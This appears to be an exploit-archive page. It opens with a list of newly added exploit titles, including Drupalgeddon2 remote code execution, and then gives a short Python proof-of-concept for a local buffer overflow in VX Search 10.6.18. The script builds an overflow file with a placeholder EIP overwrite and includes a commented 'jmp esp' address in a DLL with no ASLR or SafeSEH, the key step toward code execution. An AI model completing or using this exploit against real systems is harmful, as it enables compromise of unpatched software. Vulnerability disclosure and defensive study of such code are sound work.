
14 changes to exploits/shellcodes PDFunite 0.41.0 - '.pdf' Local Buffer Overflow RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow VX Search 10.6.18 - 'directory' Local Buffer Overflow Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Easy File Sharing Web Server 7.2 - Stack Buffer Overflow Coship RT3052 Wireless Router - Persistent Cross-Site Scripting Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting Rvsitebuilder CMS - Database Backup Download Match Clone Script 1.0.4 - Cross-Site Scripting Kodi 17.6 - Persistent Cross-Site Scripting Lutron Quantum 2.0 - 3.2.243 - Information Disclosure WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
23 lines
No EOL
810 B
Python
Executable file
23 lines
No EOL
810 B
Python
Executable file
#!/usr/bin/python
|
|
# Title: VX Search 10.6.18 Local Buffer Overflow
|
|
# Author: Kevin McGuigan
|
|
# Twitter: @_h3xagram
|
|
# Author Website: https://www.7elements.co.uk
|
|
# Vendor Website: http://www.vxsearch.com
|
|
# Version: 10.6.18
|
|
# Date: 18/04/2018
|
|
# Tested on: Windows 7 32-bit
|
|
# Vendor did not respond to advisory.
|
|
|
|
# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field.
|
|
|
|
filename="vxsearchPOC.txt"
|
|
junk = "A"*271
|
|
#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll)
|
|
#eip="\x1a\x2a\x2c\x65"
|
|
eip = "B" * 4
|
|
fill = "C" *900
|
|
buffer = junk + eip + fill
|
|
textfile = open(filename , 'w')
|
|
textfile.write(buffer)
|
|
textfile.close() |